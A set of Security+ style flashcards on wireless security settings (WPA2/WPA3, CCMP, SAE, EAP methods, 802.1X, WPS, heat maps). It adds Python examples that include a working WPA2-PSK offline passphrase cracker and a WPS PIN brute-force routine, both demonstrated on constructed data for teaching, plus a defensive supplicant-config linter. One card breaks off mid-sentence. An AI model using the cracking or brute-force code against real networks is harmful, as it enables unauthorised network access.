3.4 Given a scenario, install and configure wireless security settings. Flashcards
Wi-Fi Protected Access 2 (WPA2)
Wi-Fi Protected Access 2 (WPA2) is the Wi-Fi Alliance certification that succeeded the interim WPA. It implements the full ratified IEEE 802.11i amendment, replacing WPA's TKIP/RC4 with CCMP (AES), and has been mandatory for Wi-Fi certification since 2006. WPA2-Personal derives all keys from a pre-shared key (PSK) that every station on the network knows; WPA2-Enterprise authenticates each user over IEEE 802.1X/EAP and derives per-session keys from that exchange. Because the Personal four-way handshake can be verified offline, a captured handshake lets an attacker test passphrase guesses without any further contact with the network.
Wi-Fi Protected Access 3 (WPA3)
WPA3, also known as Wi-Fi Protected Access 3, is the third iteration of the Wi-Fi Alliance's security certification program and the successor to WPA2, which has been in use since 2004; the Wi-Fi Alliance began certifying WPA3 products in 2018. WPA3-Personal replaces the PSK four-way handshake with Simultaneous Authentication of Equals (SAE), which resists offline dictionary attacks and gives forward secrecy; WPA3-Enterprise keeps 802.1X/EAP and adds an optional 192-bit mode with stronger cipher suites; both require Protected Management Frames (IEEE 802.11w), which blocks forged deauthentication frames. A network running in WPA2/WPA3 transition mode still accepts WPA2 clients and so keeps WPA2's weaknesses until transition mode is turned off.
Counter-mode/CBC-MAC Protocol (CCMP)
Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP) is the encryption protocol for wireless LAN products defined by the IEEE 802.11i amendment to the original IEEE 802.11. It uses AES-128 in CCM mode: counter mode provides confidentiality and CBC-MAC provides integrity, with a per-packet nonce built from a packet number that also gives replay protection. CCMP replaced TKIP, the RC4-based stopgap WPA had used so that WEP-era hardware could be upgraded; WPA2 requires CCMP, and WPA3 uses it in Personal mode, with GCMP-256 (AES-256 in GCM mode) in the 192-bit Enterprise mode.
Simultaneous Authentication of Equals (SAE)
Simultaneous Authentication of Equals (SAE) is a password-authenticated key exchange originally developed for IEEE 802.11s mesh networks. Defined in RFC 7664, it uses the Dragonfly protocol: both sides derive a group element from the password and then run an exchange in which each proves knowledge of the password without transmitting anything that an eavesdropper could test guesses against. A captured exchange is therefore useless for an offline dictionary attack, each guess costs the attacker an online attempt against the access point, and the resulting session key has forward secrecy. WPA3-Personal uses SAE in place of the WPA2 PSK four-way handshake. SAE is not a new protocol;
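The following is an added example (not from the original page) that serves the WPA2 and SAE cards above: it shows why the WPA2-PSK four-way handshake can be attacked offline and, by contrast, why SAE has no equivalent. The code plays both the access point and the station to produce the fields a sniffer would record from a WPA2-PSK handshake, then verifies candidate passphrases against the captured MIC with no further contact with the network. The SSID, MAC addresses, nonces, EAPOL bytes, passphrase and wordlist are all constructed for the example.

```python
import hashlib
import hmac
from typing import Iterable, Optional

# Constructed stand-in for what a sniffer sees in a WPA2-PSK four-way handshake
# (values are made up; none of this is real captured traffic).
SSID = "ExampleNet"
AP_MAC = bytes.fromhex("0a1b2c3d4e5f")       # authenticator address (AA)
STA_MAC = bytes.fromhex("6a7b8c9dae0f")      # supplicant address (SPA)
ANONCE = bytes(range(32))                    # nonce sent by the AP in message 1
SNONCE = bytes(range(32, 64))                # nonce sent by the station in message 2
# EAPOL-Key message 2 body with its 16-byte MIC field zeroed; a placeholder byte
# string stands in for the real frame, since only its bytes matter for the MIC.
EAPOL_M2 = b"\x01\x03\x00\x75" + bytes(117)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: expand the PMK with both MAC addresses and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    ]
    return b"".join(blocks)[:64]          # KCK = bytes 0-15, KEK = 16-31, TK = 32-47


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def simulate_capture(passphrase: str) -> dict:
    """Play both AP and station to produce the fields a sniffer would record (constructed)."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return {
        "ssid": SSID, "aa": AP_MAC, "spa": STA_MAC, "anonce": ANONCE, "snonce": SNONCE,
        "eapol": EAPOL_M2, "mic": eapol_mic(kck, EAPOL_M2),
    }


def crack_wpa2_psk(capture: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: each guess is verified against the captured MIC with
    no further contact with the network. Under SAE there is no such value to check."""
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:     # WPA2 passphrases are 8-63 characters
            continue
        pmk = pmk_from_passphrase(candidate, capture["ssid"])
        ptk = ptk_from_pmk(pmk, capture["aa"], capture["spa"], capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return candidate
    return None


CAPTURE = simulate_capture("sunflower2024")   # the network's real passphrase (constructed)
WORDLIST = ["password", "letmein", "short", "ExampleNet1", "sunflower2024", "qwerty123"]

if __name__ == "__main__":
    print("recovered passphrase:", crack_wpa2_psk(CAPTURE, WORDLIST))
```

The cost per guess is one PBKDF2 run (4,096 HMAC-SHA1 iterations), which is why WPA2 cracking is a GPU workload and why a short or dictionary passphrase falls quickly. With SAE the capture contains only the Dragonfly commit and confirm values, which cannot be tested against a guessed password, so each guess has to be made live against the access point.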
Extensible Authentication Protocol (EAP)
The Extensible Authentication Protocol (EAP) is an authentication framework, not a single method, that grew out of the authentication options of the Point-to-Point Protocol (PPP), a protocol commonly used to connect two devices directly. EAP is defined in RFC 2284 (obsoleted by RFC 3748). EAP itself provides only the request/response framing and the success/failure result; the security of a deployment depends on the EAP method carried inside it (EAP-TLS, PEAP, EAP-TTLS, EAP-FAST). On wireless networks EAP is carried between station and access point as EAPOL (EAP over LAN, from IEEE 802.1X) and between access point and authentication server inside RADIUS.
Protected Extensible Authentication Protocol (PEAP)
PEAP, or Protected EAP, was developed to protect EAP communication by encapsulating it in a Transport Layer Security (TLS) tunnel. It is an open standard developed jointly by Cisco, Microsoft, and RSA. Many EAP methods assume they run over a channel that cannot be observed or tampered with; PEAP supplies that channel by having the server present a certificate and establishing TLS before the inner method (most commonly EAP-MSCHAPv2) runs. The protection holds only if the client validates the server certificate and the expected server name: a supplicant configured to skip validation will complete the inner MS-CHAPv2 exchange with a rogue access point, handing it a challenge/response pair that can be cracked offline.
EAP-FAST
EAP-FAST (EAP Flexible Authentication via Secure Tunneling), described in RFC 4851, was proposed by Cisco as a replacement for LEAP, an earlier Cisco EAP method whose MS-CHAP-based exchange was vulnerable to offline dictionary attacks. It offers a lightweight tunneling protocol to enable authentication. Its distinguishing characteristic is the Protected Access Credential (PAC), a shared secret used to establish a TLS tunnel through which client credentials are verified. The PAC must first be provisioned to the client; if that is done anonymously in-band rather than out of band or under server certificate validation, a rogue server can provision its own PAC and capture the inner credentials. The Wi-Fi Alliance added EAP-FAST to its list of supported protocols for WPA/WPA2/WPA3.
EAP-TLS
EAP-TLS is an Internet Engineering Task Force (IETF) open standard (RFC 5216; RFC 9190 for TLS 1.3) that uses the TLS protocol, the IETF standardization of Secure Sockets Layer (SSL), to secure the authentication process. Both sides authenticate with certificates: the server proves its identity to the client, and the client proves its identity with a client certificate and the corresponding private key, so no password crosses the network and nothing an eavesdropper captures can be replayed or cracked offline. It is still considered one of the most secure EAP methods for that reason; the cost is a PKI to issue, renew, and revoke client certificates, which is what keeps many deployments on password-based methods.
EAP-TTLS
EAP-TTLS (EAP-Tunneled TLS, RFC 5281) is a variant of EAP-TLS. As in EAP-TLS, the server authenticates to the client with a certificate, but the client side of the authentication is then run inside the TLS tunnel, which allows legacy methods such as Password Authentication Protocol (PAP), Challenge-Handshake Authentication Protocol (CHAP), Microsoft Challenge Handshake Authentication Protocol (MS-CHAP), and MS-CHAP-V2 to be used. The tunnel protects the inner authentication from man-in-the-middle attacks, and although client-side certificates can be used they are not required, which makes EAP-TTLS easier to deploy than EAP-TLS to clients that have no certificates. As with PEAP, that protection depends on the client validating the server certificate; with an inner method such as PAP the password itself is sent inside the tunnel, so a client that accepts any server certificate hands its password to a rogue server in the clear. The Wi-Fi Alliance added EAP-TTLS to its list of supported protocols for WPA/WPA2/WPA3.
IEEE 802.1X
IEEE 802.1X is a port-based network access control standard: a supplicant (the client) must authenticate through an authenticator (a switch port or a wireless access point) to an authentication server (usually RADIUS) before the port passes anything other than EAPOL authentication traffic. On wireless networks the access point keeps the virtual port for each association blocked until the EAP exchange succeeds; the authentication server then returns the Pairwise Master Key, from which the four-way handshake derives per-session encryption keys. WPA2-Enterprise and WPA3-Enterprise use IEEE 802.1X in this way, carrying an EAP method such as EAP-TLS, PEAP, or EAP-TTLS; the method chosen, and whether clients validate the server certificate, determines how strong the result actually is.
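As an added example for the EAP method and 802.1X cards (not the page's own material), the check below parses wpa_supplicant network blocks and flags the supplicant-side settings that undermine a tunneled EAP method: no ca_cert/ca_path (any RADIUS server certificate is accepted), no domain_suffix_match/domain_match/altsubject_match (any certificate from the trusted CA is accepted), and a tunneled method whose outer identity exposes the username. The two configurations, the SSIDs, the CA path, the server name and the credentials are constructed for the example; the option names are wpa_supplicant's own.

```python
import re
from typing import Dict, List

# Two constructed wpa_supplicant.conf fragments, not taken from any real deployment.
WEAK_CONF = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    password="Winter2024!"
    phase2="auth=MSCHAPV2"
}
"""

HARDENED_CONF = """
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="jdoe"
    anonymous_identity="anonymous@corp.example"
    password="Winter2024!"
    phase2="auth=MSCHAPV2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.example"
}
network={
    ssid="CorpWiFi-TLS"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="jdoe@corp.example"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    client_cert="/etc/wpa/jdoe.crt"
    private_key="/etc/wpa/jdoe.key"
    domain_suffix_match="radius.corp.example"
}
"""

TUNNELED_METHODS = {"PEAP", "TTLS", "FAST"}   # methods that carry a password inside TLS
SERVER_NAME_CHECKS = ("domain_suffix_match", "domain_match", "altsubject_match")


def parse_networks(conf: str) -> List[Dict[str, str]]:
    """Parse each network={...} block into a dict; quoted values are unquoted."""
    networks = []
    for body in re.findall(r"network=\{(.*?)\}", conf, re.S):
        net: Dict[str, str] = {}
        for line in body.splitlines():
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            net[key.strip()] = value.strip().strip('"')
        networks.append(net)
    return networks


def lint_network(net: Dict[str, str]) -> List[str]:
    """Return findings for one 802.1X network block; an empty list means no finding."""
    findings: List[str] = []
    if "WPA-EAP" not in net.get("key_mgmt", ""):
        return findings                          # PSK/SAE networks are out of scope here
    ssid = net.get("ssid", "<no ssid>")
    eap = net.get("eap", "").upper()
    if "ca_cert" not in net and "ca_path" not in net:
        findings.append(f"{ssid}: no ca_cert/ca_path, so any RADIUS server certificate is accepted")
    if not any(k in net for k in SERVER_NAME_CHECKS):
        findings.append(f"{ssid}: no server name check, so any certificate from the trusted CA is accepted")
    if eap in TUNNELED_METHODS and "password" in net and "anonymous_identity" not in net:
        findings.append(f"{ssid}: outer identity reveals the username to every proxy on the path")
    return findings


def lint_config(conf: str) -> List[str]:
    """Findings for every network block in a configuration."""
    return [f for net in parse_networks(conf) for f in lint_network(net)]


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, "->", lint_config(conf) or "no findings")
```

The first two findings are the ones that matter for an evil-twin attack: without ca_cert the supplicant builds the TLS tunnel to whatever access point answers, and without a server name match a certificate from any issuer in the trust store (including a public CA) passes. The third is the privacy point that RADIUS federation depends on. The EAP-TLS block needs no password and so produces no finding even when the checks are applied to it.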
Remote Authentication Dial-in User Service (RADIUS) Federation
Chaining RADIUS servers into a federation lets a user authenticate at a visited organization against the RADIUS server of their home organization. Each RADIUS proxy routes a request by the realm in the user's identity (the part after the @) toward the home server, and the EAP exchange passes end to end through the proxies. One example is eduroam (short for education roaming), which connects users of education institutions worldwide. The concept is simple; the technical details of maintaining the hierarchy of RADIUS servers and realm routing tables are daunting at a worldwide scale. Because every proxy on the path sees the RADIUS traffic, the user's credentials are protected only by the EAP tunnel to the home server, which is why federations require tunneled methods with clients that validate the home server's certificate, and why an anonymous outer identity (anonymous@realm) is used so that only the realm, not the username, is exposed in transit.
Captive portals
A captive portal is a technique for handling authentication on a wireless network through the user's web browser. Frequently employed in public hotspots, it intercepts a new client's traffic, usually by redirecting HTTP requests (and often DNS) to a login page, and holds the client there until the user authenticates or accepts terms; only then does the gateway allow the client's MAC or IP address onto the network. Modern operating systems detect a portal by fetching a known probe URL and noticing an unexpected response. A captive portal controls admission only: the wireless link itself is often open and unencrypted, and because access is granted per MAC/IP address, an attacker on the same network can clone an authenticated client's address to bypass it.
Wi-Fi Protected Setup (WPS)
Wi-Fi Protected Setup (WPS) is a network security standard created to give users an easy method of configuring wireless networks. Designed for home and small business networks, it lets a device join by entering an eight-digit PIN (or by pushing a button) instead of the WPA2 passphrase. WPS consists of a series of EAP messages and has been shown to be susceptible to a brute force attack: the access point verifies the first four digits of the PIN and the next three separately, and the eighth digit is a checksum, so an attacker needs at most 10,000 + 1,000 online guesses rather than 10^8, and on success the access point hands over the network's WPA2 passphrase. The practical control is to disable WPS, or at least its PIN method, on any access point that supports it.
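Added example (not from the page) simulating the WPS PIN brute force. The access point is a constructed stand-in that reports only what the real protocol leaks through its NACK messages: whether the first four digits were right, and then whether the next three were. The attack code enumerates the two halves separately and derives the eighth digit from the WPS checksum rule, so the search space is at most 11,000 PINs instead of 100 million. The PIN used is constructed; the checksum algorithm is the one from the WPS specification.

```python
from typing import Optional


def wps_checksum(first_seven: int) -> int:
    """Checksum digit that the WPS specification appends to the 7 chosen PIN digits."""
    accum, pin = 0, first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: str) -> bool:
    """True when the PIN is eight digits and its last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedAccessPoint:
    """Stand-in for an AP with the WPS PIN method enabled (constructed; no real WPS
    frames are exchanged). In the real exchange the attacker acts as an external
    registrar: its M4 proves knowledge of PIN digits 1-4 and its M6 proves digits 5-8.
    The AP answers each with the next message on success or a NACK on failure, which
    is what tells the attacker which half was wrong."""

    def __init__(self, pin: str) -> None:
        if not wps_pin_valid(pin):
            raise ValueError("PIN fails the WPS checksum")
        self._half1, self._half2 = pin[:4], pin[4:]
        self.attempts = 0

    def try_pin(self, half1: str, half2: str) -> str:
        self.attempts += 1
        if half1 != self._half1:
            return "NACK after M4"
        if half2 != self._half2:
            return "NACK after M6"
        return "M7"   # M7 carries the AP's network credentials to the registrar


def brute_force_wps(ap: SimulatedAccessPoint) -> Optional[str]:
    """Online brute force exploiting the split verification: at most 10,000 + 1,000 attempts."""
    half1 = None
    for i in range(10_000):                       # phase 1: digits 1-4 on their own
        if ap.try_pin(f"{i:04d}", "0000") != "NACK after M4":
            half1 = f"{i:04d}"
            break
    if half1 is None:
        return None
    for j in range(1_000):                        # phase 2: digits 5-7; digit 8 is the checksum
        three = f"{j:03d}"
        half2 = three + str(wps_checksum(int(half1 + three)))
        if ap.try_pin(half1, half2) == "M7":
            return half1 + half2
    return None


if __name__ == "__main__":
    ap = SimulatedAccessPoint("12345670")   # constructed PIN; its checksum digit is 0
    print(brute_force_wps(ap), "recovered after", ap.attempts, "attempts")
```

The two phases are independent, which is the whole weakness: a correct first half is confirmed before the second half is ever tested, so the expected cost is about 5,500 attempts and the worst case 11,000. Access points that rate-limit or lock out after a few PIN failures slow this down but do not change the arithmetic; disabling the PIN method removes it.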
Site surveys
When developing a coverage map for a complex building site, you need to take into account a wide variety of factors, particularly walls, interfering sources, and floor plans. A site survey involves several steps: mapping the floor plan, testing for RF interference, testing for RF coverage, and analyzing building materials in software. A predictive site survey models the floor plan and its materials in software, which then suggests access point placement and power levels; a passive or active survey walks the site with an analyzer to measure what is actually received. From a security standpoint a survey also shows where coverage spills beyond the building, which is the area an attacker can work from, and a repeat survey can reveal rogue access points that were not in the plan.
Heat maps
A Wi-Fi heat map is a map of wireless signal coverage and strength. Typically, a heat map shows the layout of a room, floor, or facility overlaid with a graphical representation of the signal. Heat maps are created with a Wi-Fi analyzer and survey software that plot signal strength (RSSI) by location; the same map shows where signal leaks past the perimeter and where coverage is weak enough that clients may roam to a rogue or neighboring access point.
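Added example (not from the page) of the predictive approach described in the site survey and heat map cards: a log-distance path-loss model with per-wall attenuation is applied to a constructed floor plan to produce an ASCII heat map and to count the outdoor cells where the signal is still usable, that is, the perimeter an attacker can work from. The floor plan, cell size, wall losses, path-loss exponent, reference loss and access point power are assumed values, not measurements; a real survey would replace them with measured ones.

```python
import math
from typing import List, Tuple

# Constructed floor plan (not a real building): '0' indoor open space, '1' interior wall,
# '2' exterior wall, '3' outdoors. Each cell is CELL_M metres square.
PLAN = [
    "333333333333333333",
    "322222222222222223",
    "320000000100000023",
    "320000000100000023",
    "320000000111111023",
    "320000000000000023",
    "321111111000000023",
    "320000000000000023",
    "322222222222222223",
    "333333333333333333",
]
CELL_M = 2.0
WALL_LOSS_DB = {"1": 3.0, "2": 12.0}     # assumed attenuation per wall cell crossed
AP = (5, 9, 20.0)                        # (row, col, transmit power in dBm), assumed


def walls_between(plan: List[str], a: Tuple[int, int], b: Tuple[int, int]) -> float:
    """Sum the loss of each distinct wall cell on the straight line from a to b."""
    (r0, c0), (r1, c1) = a, b
    steps = max(abs(r1 - r0), abs(c1 - c0), 1)
    loss, last = 0.0, None
    for s in range(1, steps + 1):
        cell = (round(r0 + (r1 - r0) * s / steps), round(c0 + (c1 - c0) * s / steps))
        if cell != last:
            loss += WALL_LOSS_DB.get(plan[cell[0]][cell[1]], 0.0)
        last = cell
    return loss


def rssi_dbm(tx_dbm: float, distance_m: float, wall_loss_db: float,
             n: float = 3.0, pl0: float = 40.0) -> float:
    """Log-distance model: RSSI = Ptx - PL(1 m) - 10 n log10(d) - wall losses.
    n = 3 and PL(1 m) = 40 dB are assumed indoor 2.4 GHz values."""
    return tx_dbm - pl0 - 10 * n * math.log10(max(distance_m, 1.0)) - wall_loss_db


def heat_map(plan: List[str], ap: Tuple[int, int, float]) -> List[List[float]]:
    """Predicted RSSI for every cell of the plan."""
    grid = []
    for r, row in enumerate(plan):
        line = []
        for c in range(len(row)):
            d = math.hypot(r - ap[0], c - ap[1]) * CELL_M
            line.append(rssi_dbm(ap[2], d, walls_between(plan, (ap[0], ap[1]), (r, c))))
        grid.append(line)
    return grid


def render(grid: List[List[float]], plan: List[str]) -> List[str]:
    """ASCII heat map: '#' >= -60 dBm, '+' >= -70, '.' >= -80, ' ' weaker; walls as '|'."""
    out = []
    for r, row in enumerate(grid):
        chars = []
        for c, v in enumerate(row):
            if plan[r][c] in WALL_LOSS_DB:
                chars.append("|")
            else:
                chars.append("#" if v >= -60 else "+" if v >= -70 else "." if v >= -80 else " ")
        out.append("".join(chars))
    return out


def leakage(grid: List[List[float]], plan: List[str], threshold_dbm: float = -70.0) -> int:
    """Outdoor cells where predicted RSSI is still usable: the area an attacker can work from."""
    return sum(1 for r, row in enumerate(grid) for c, v in enumerate(row)
               if plan[r][c] == "3" and v >= threshold_dbm)


if __name__ == "__main__":
    grid = heat_map(PLAN, AP)
    print("\n".join(render(grid, PLAN)))
    print("outdoor cells at or above -70 dBm:", leakage(grid, PLAN))
```

Moving the access point, lowering its transmit power, or changing the assumed wall losses and re-running the model is the predictive survey loop; the leakage count is the figure to minimize before a walk-through survey confirms the prediction with real measurements.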